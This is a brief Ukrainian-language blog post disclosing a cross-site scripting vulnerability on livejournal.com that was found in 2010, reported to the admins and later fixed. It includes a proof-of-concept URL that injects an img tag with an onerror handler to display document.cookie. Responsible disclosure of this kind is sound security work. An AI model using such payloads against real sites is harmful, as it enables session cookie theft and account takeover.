Уразливість на www.livejournal.com
23:58 22.09.201108.12.2010
У серпні, 13.08.2010, я знайшов Cross-Site Scripting уразливість на популярному проекті http://www.livejournal.com. Про що найближчим часом сповіщу адміністрацію проекту.
Раніше я вже писав про уразливості на livejournal.com.
Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
22.09.2011
XSS:
http://www.livejournal.com/update.bml?event=%3Cimg%20src='1'%20onerror=alert(document.cookie)%3E
XSS працювала в браузерах IE та Chrome.
Дана уразливість вже виправлена.